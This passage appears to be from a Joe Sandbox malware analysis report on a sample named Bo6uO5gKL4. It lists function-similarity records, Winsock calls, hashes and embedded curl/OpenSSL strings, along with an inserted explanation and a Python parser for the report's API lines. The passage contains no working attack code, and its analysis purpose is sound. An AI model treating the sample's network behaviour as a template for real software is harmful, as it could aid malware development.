                                       • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: closesocket
                                      • String ID:
                                      • API String ID: 2781271927-0
                                      • Opcode ID: 5abf2a810b68984ae32f66623768236a3cf71b0ba668f532934eca6febe96276
                                      • Instruction ID: 2027a88956d1ce328dd581cb0da977e2731a1e57de2620eb2a4c55de166a7b7d
                                      • Opcode Fuzzy Hash: 5abf2a810b68984ae32f66623768236a3cf71b0ba668f532934eca6febe96276
                                      • Instruction Fuzzy Hash: 6DD0123470020157CB24DA14CC84A97766B7FD1B11FA9DB6CE42C4A655D73BDC47C641
                                      APIs
                                      • ioctlsocket.WS2_32(?,8004667E,?,?,005BAF56,?,00000001), ref: 005E67FC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                       • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: ioctlsocket
                                      • String ID:
                                      • API String ID: 3577187118-0
                                      • Opcode ID: 1b32e1f0730cba6d416a1de749af380967a63e7042b2e13ee150f70d5de46e3a
                                      • Instruction ID: fd7d81672d212ed3b44b79f2b11354356f5c918ce99ed8121b6d4dadcf1e78ad
                                      • Opcode Fuzzy Hash: 1b32e1f0730cba6d416a1de749af380967a63e7042b2e13ee150f70d5de46e3a
                                      • Instruction Fuzzy Hash: 15C012F1118601AFC6088714D865A6F76E8DB85355F01581CB04681180EA709990CA16
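The "APIs" lines in the function entries above (connect followed by WSAGetLastError, gethostname, getsockname, send, socket, closesocket, ioctlsocket with 8004667E) are the only part of these records a triage analyst actually reads, and their notation is compact: `func.module(stack values...), ref: caller`. The parser below is an added example, not Joe Sandbox's own tooling or code from the sample. It turns those lines into structured records and decodes the one constant that matters here: 0x8004667E is FIONBIO in winsock2.h, so the sample puts a socket into non-blocking mode, which is why connect is immediately followed by a WSAGetLastError check. The sample lines are copied from the entries above; the assumption (ours, not stated by the report) is that the sandbox prints a stack snapshot of which only the first n values are the call's documented parameters, and the remaining values are caller stack noise.

```python
import re
from collections import Counter

# Constructed sample: the "APIs" lines from the function entries of this report,
# copied verbatim so the parser can be run offline.
SAMPLE_API_LINES = """
• connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0064B29E,?,00000000,?,?), ref: 0064B0BA
• WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00633C41,00000000), ref: 0064B0C1
• gethostname.WS2_32(00000000,00000040), ref: 00634AA5
• getsockname.WS2_32(?,?,00000080), ref: 0064AFD0
• send.WS2_32(?,?,?,00000000,00000000,?), ref: 0064A97F
• socket.WS2_32(?,0064B280,00000000,-00000001,00000000,0064B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0064AF67
• closesocket.WS2_32(?,00649422,?,?,?,?,?,?,?,?,?,?,?,w3c,00A5C880,00000000), ref: 0064B04D
• ioctlsocket.WS2_32(?,8004667E,?,?,005BAF56,?,00000001), ref: 005E67FC
"""

# One report line: "<func>.<module>(<comma separated stack values>), ref: <caller address>"
API_LINE = re.compile(
    r"^\s*•?\s*(?P<func>\w+)\.(?P<module>[\w.]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Documented parameter counts (Winsock). Assumption: the sandbox prints a stack snapshot,
# so only the first n values are the call's real parameters; the rest is caller stack.
PARAM_COUNT = {
    "socket": 3, "connect": 3, "send": 4, "closesocket": 1, "ioctlsocket": 3,
    "gethostname": 2, "getsockname": 3, "WSAGetLastError": 0,
}

# ioctlsocket command codes from winsock2.h worth recognising in a report.
IOCTL_CMDS = {0x8004667E: "FIONBIO", 0x4004667F: "FIONREAD", 0x40047307: "SIOCATMARK"}


def parse_arg(tok):
    """One stack token: '?' -> None, 8-digit hex (optionally '-' prefixed) -> int, else raw text."""
    if tok == "?":
        return None
    neg = tok.startswith("-")
    body = tok[1:] if neg else tok
    if re.fullmatch(r"[0-9A-Fa-f]{8}", body):
        val = int(body, 16)
        return -val if neg else val
    return tok  # inline string residue such as 'w3c'


def parse_api_line(line):
    """Parse one report line into a record, or None if the line is not an API line."""
    m = API_LINE.match(line)
    if not m:
        return None
    func = m.group("func")
    stack = [parse_arg(t) for t in m.group("args").split(",")]
    n = PARAM_COUNT.get(func)
    rec = {
        "func": func,
        "module": m.group("module"),
        "ref": int(m.group("ref"), 16),
        "params": stack[:n] if n is not None else stack,
        "stack_tail": stack[n:] if n is not None else [],
    }
    if func == "ioctlsocket" and len(rec["params"]) > 1 and isinstance(rec["params"][1], int):
        rec["note"] = IOCTL_CMDS.get(rec["params"][1], "unknown ioctl cmd")
    return rec


def parse_report(text):
    return [r for r in (parse_api_line(l) for l in text.splitlines()) if r]


def summarize(records):
    """Per-import call counts plus the behavioural idioms visible in this call set."""
    counts = Counter(r["func"] for r in records)
    flags = []
    if any(r.get("note") == "FIONBIO" for r in records):
        flags.append("sets socket non-blocking (ioctlsocket FIONBIO)")
    funcs = {r["func"] for r in records}
    if {"connect", "WSAGetLastError"} <= funcs:
        flags.append("checks WSAGetLastError after connect (typical of non-blocking connect)")
    return {"counts": dict(counts), "flags": flags}


if __name__ == "__main__":
    recs = parse_report(SAMPLE_API_LINES)
    for r in recs:
        print(f"{r['ref']:08X} {r['func']}{tuple(r['params'])} {r.get('note', '')}")
    print(summarize(recs))
```

The `ref` value is the return address of the call, so sorting records by it groups calls into the functions the report lists them under; `stack_tail` keeps the extra values in case one of them is a recognisable string or code pointer (here `w3c` on the closesocket line).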
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                       • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: b74837afb8a71d7e4e765e78b4896809b944beb96b86e514a6d9588528e566e8
                                      • Instruction ID: 9c24e8ae6b3c14f7356f439eb009b62e0a77423695cef8de6838625886e3a946
                                      • Opcode Fuzzy Hash: b74837afb8a71d7e4e765e78b4896809b944beb96b86e514a6d9588528e566e8
                                      • Instruction Fuzzy Hash: C13193B59057059FCB00FFB8C6856AEBBF0BF44745F008969E899A7241E7349A48CF52
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                       • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $d$nil)
                                      • API String ID: 0-394766432
                                      • Opcode ID: 87b91de67c2faafe6d71d889f2e86687d5c5684cd5769df2f3a35cc497f0f109
                                      • Instruction ID: f5b27c5b89d6157a34454808258967a81f3ff8197743683ec23669f20cf961d6
                                      • Opcode Fuzzy Hash: 87b91de67c2faafe6d71d889f2e86687d5c5684cd5769df2f3a35cc497f0f109
                                      • Instruction Fuzzy Hash: 731343706083458FD720DF28C08066ABBE5BFC9714F244E2DE9999B3A1D775ED85CB82
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                      • API String ID: 0-122532811
                                      • Opcode ID: c41d5acd89d632ed925eb83579fc2ee3cf10896f6491e8081e60c5a04f92475d
                                      • Instruction ID: d4c12441894196b7f71069dc34a6c8278a0e7e5d82d4866a47242e5f8c89d8b0
                                      • Opcode Fuzzy Hash: c41d5acd89d632ed925eb83579fc2ee3cf10896f6491e8081e60c5a04f92475d
                                      • Instruction Fuzzy Hash: E642F771B08701AFDB08DE28CC45B6BBAEAFBC4704F04892CF55D97291E775AD148B92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                      • API String ID: 0-1914377741
                                      • Opcode ID: 993e44b96defb0ecf88d1ae206ffafccbcdc62a3f814de76bbb0eb2aaa796dcf
                                      • Instruction ID: 470e3f7410821a7a2729681ab999d52b34fc66dbffdc486656b3cb2a11a6b67e
                                      • Opcode Fuzzy Hash: 993e44b96defb0ecf88d1ae206ffafccbcdc62a3f814de76bbb0eb2aaa796dcf
                                      • Instruction Fuzzy Hash: CA721931A08B419FE7258A28C445FAA7FD2BF92344F048A2CED855B293F776DD84C751
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                      • API String ID: 0-2550110336
                                      • Opcode ID: 81e29b7b42a3d3871784f0a2d9866f5f51e6c33f09be07fa5a78c3188acd25fb
                                      • Instruction ID: a07ddca823f22772eedcf9855720eac7d998fecf6b5009afe7a7ac2d9bcb2861
                                      • Opcode Fuzzy Hash: 81e29b7b42a3d3871784f0a2d9866f5f51e6c33f09be07fa5a78c3188acd25fb
                                      • Instruction Fuzzy Hash: 6A324770748348EBE724BB209C46F3A77D5AF90B04F544528F944962D3EBBCE994C782
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $.$;$?$?$xn--$xn--
                                      • API String ID: 0-543057197
                                      • Opcode ID: 14f5168ee9aa327c6c7b22984cb63c75e041f4b7111935f1e3ed8704634ed9cb
                                      • Instruction ID: 49301d4ab25962ae393fc411c86fdd1e855a76e3565c8a69e045c22630ab341b
                                      • Opcode Fuzzy Hash: 14f5168ee9aa327c6c7b22984cb63c75e041f4b7111935f1e3ed8704634ed9cb
                                      • Instruction Fuzzy Hash: A52205B2A04301AFEB209B24DC41BAB77E6AF91309F04453CF88997292F775DD09C792
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                      • API String ID: 0-2555271450
                                      • Opcode ID: facfb42e0ae5174dbe97b6f886923e40bc07acf952be04b77c23337ca83323d3
                                      • Instruction ID: 16b552fe4987bffa452f4eabb2e782b833279198416a3169a22d5136ba631f0d
                                      • Opcode Fuzzy Hash: facfb42e0ae5174dbe97b6f886923e40bc07acf952be04b77c23337ca83323d3
                                      • Instruction Fuzzy Hash: 57C26B316087418FE714DE28C49066ABBE6FFC9314F158A2DEC99AB352D734ED458B82
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675257923.0000000001223000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_580000_Bo6uO5gKL4.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                      • API String ID: 0-2555271450
                                      • Opcode ID: 59b3f855ce341ebcafe954df4bbea384a226d12115164dcb039121918454b32c
                                      • Instruction ID: 8047c8ad1dc5bbdaedb6da3a1abeb7a45a09042ef37f02e5e9faef5c01fc4520
                                      • Opcode Fuzzy Hash: 59b3f855ce341ebcafe954df4bbea384a226d12115164dcb039121918454b32c
                                      • Instruction Fuzzy Hash: 45828C71A083019FD714EE28C88572BBBE1BFC9724F148A2DF9A9A7291D730DC45CB52
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1674269432.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                      • Associated: 00000000.00000002.1674245746.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674269432.0000000000CC8000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674778943.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000CCD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.000000000104E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001055000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1674797118.0000000001065000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675120416.0000000001066000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1675239121.0000000001221000.00000040.00000001.01000000.00000003.sdmp
